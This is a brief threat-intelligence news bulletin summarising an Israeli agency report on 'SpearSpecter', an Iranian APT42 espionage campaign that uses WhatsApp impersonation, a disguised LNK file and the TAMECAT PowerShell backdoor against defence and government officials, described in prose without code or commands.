471/68 Tuesday, November 18, 2025
The Israel National Digital Agency (INDA) has published a report revealing a new cyber-espionage campaign called “SpearSpecter,” operated by APT42, a threat group backed by the Iranian government and linked to the Islamic Revolutionary Guard Corps (IRGC). The operation was first detected in early September 2025 and is still ongoing. Its primary targets include senior officials in defense and government sectors. The attackers rely on highly convincing social engineering tactics—such as impersonating trusted figures to send prestigious seminar invitations or schedule important meetings. Alarmingly, the operation has also expanded to target family members of high-profile individuals to broaden avenues of compromise.
The attack chain is sophisticated. It begins with the threat actor impersonating a trusted contact through WhatsApp and sending a malicious link claiming to contain important meeting documents. When the victim clicks the link, they are redirected to download a Windows Shortcut (LNK) file disguised as a PDF, exploiting the “search-ms:” protocol trick. Once opened, the LNK file silently communicates with the attackers’ infrastructure hosted on Cloudflare Workers, downloading a loader script that installs a PowerShell backdoor known as “TAMECAT.”
The TAMECAT malware is equipped with extensive espionage capabilities, including system reconnaissance, targeted file theft based on predefined extensions, browser data extraction (from Chrome and Edge), Outlook mailbox theft, and continuous screenshot capture. Notably, the malware employs multiple strategies to remain undetected. It communicates with its command-and-control (C2) servers over three concurrent channels-HTTPS, Discord, and Telegram-ensuring reliable connectivity even if one channel is blocked. It also operates in-memory, using encryption and heavy obfuscation to hinder analysis and evade security tools.
Source https://thehackernews.com/2025/11/iranian-hackers-launch-spearspecter-spy.html
